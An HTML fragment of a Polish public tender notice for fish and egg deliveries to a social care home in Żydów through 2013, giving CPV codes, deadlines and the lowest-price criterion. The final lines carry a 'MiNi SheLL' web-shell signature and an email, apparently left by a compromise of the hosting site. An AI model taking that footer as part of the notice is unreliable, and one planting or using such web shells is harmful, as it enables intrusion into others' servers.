<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sukcesywne dostawy ryb przetworzonych i konserwowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy ryb przetworzonych i konserwowanych na potrzeby Domu  Pomocy Społecznej w Żydowie 
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sukcesywne dostawy jaj konsumpcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy jaj konsumpcyjnych  na potrzeby Domu Pomocy Społecznej w Żydowie. Jaja konsumpcyjne L (63-73g)w ilości szt.60000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com